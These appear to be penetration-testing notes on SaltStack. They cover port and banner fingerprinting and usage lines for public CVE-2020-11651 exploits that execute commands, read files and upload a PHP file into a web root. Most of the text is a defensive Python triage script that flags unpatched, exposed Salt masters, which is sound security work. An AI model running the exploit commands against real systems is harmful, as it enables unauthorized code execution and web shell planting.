# saltstack

## Interesting Paths

```bash
# identifying ports
4505/tcp open  zmtp    ZeroMQ ZMTP 2.0
4506/tcp open  zmtp    ZeroMQ ZMTP 2.0

# identify via header
salt-api/3000-1
```

## SaltStack 3000.1

```
# PoC: https://github.com/jasperla/CVE-2020-11651-poc
python3 exploit.py --master IP [--exec CMD] [-r READ_FILE]
# upload file: --upload-src .php --upload-dest [absolute path: /var/www/html/.php]

# PoC: https://github.com/dozernz/cve-2020-11651
```
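Defender-side triage of the same fingerprint data, as an added example (not part of these notes or of either PoC): it reads nmap output and a version banner and reports whether a Salt master is exposed and predates the CVE-2020-11651 fixes (2019.2.4 and 3000.2). The function names and sample input are constructed, and treating the trailing `-1` in `salt-api/3000-1` as a package release number is an assumption.

```python
import re

# Fixed releases for CVE-2020-11651 (SaltStack advisory): 2019.2.4 and 3000.2.
FIXED_2019 = (2019, 2, 4)
FIXED_3000 = (3000, 2)
SALT_PORTS = {4505: "publish", 4506: "request"}

def parse_version(banner):
    """Return the Salt version found in a banner as a tuple, or None.

    Assumption: a trailing '-N' (as in 'salt-api/3000-1') is a package
    release number, not part of the Salt version, so it is ignored.
    """
    m = re.search(r"\b((?:20\d\d|3\d{3})(?:\.\d+)*)", banner)
    return tuple(int(p) for p in m.group(1).split(".")) if m else None

def is_vulnerable(version):
    """True if the version predates the fix on its release branch."""
    if version is None:
        return None  # unknown: confirm on the host with `salt-master --version`
    if version[0] < 3000:
        return version < FIXED_2019
    return version < FIXED_3000

def exposed_salt_ports(nmap_text):
    """List Salt master ports (4505/4506) that nmap reports as open."""
    found = []
    for line in nmap_text.splitlines():
        m = re.match(r"\s*(\d+)/tcp\s+open\b", line)
        if m and int(m.group(1)) in SALT_PORTS:
            found.append(int(m.group(1)))
    return found

def assess(nmap_text, banner):
    """Combine exposure and patch level into one triage record."""
    ports = exposed_salt_ports(nmap_text)
    version = parse_version(banner)
    vuln = is_vulnerable(version)
    return {"ports": ports, "version": version, "vulnerable": vuln,
            "urgent": bool(ports) and vuln is True}

# Constructed sample input, modelled on the fingerprint lines in these notes.
SAMPLE_SCAN = """4505/tcp open  zmtp    ZeroMQ ZMTP 2.0
4506/tcp open  zmtp    ZeroMQ ZMTP 2.0
80/tcp   open  http    nginx"""
SAMPLE_BANNER = "salt-api/3000-1"

if __name__ == "__main__":
    print(assess(SAMPLE_SCAN, SAMPLE_BANNER))
```

An `urgent` result means the master should be upgraded to a fixed release and ports 4505/4506 restricted to known minions.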
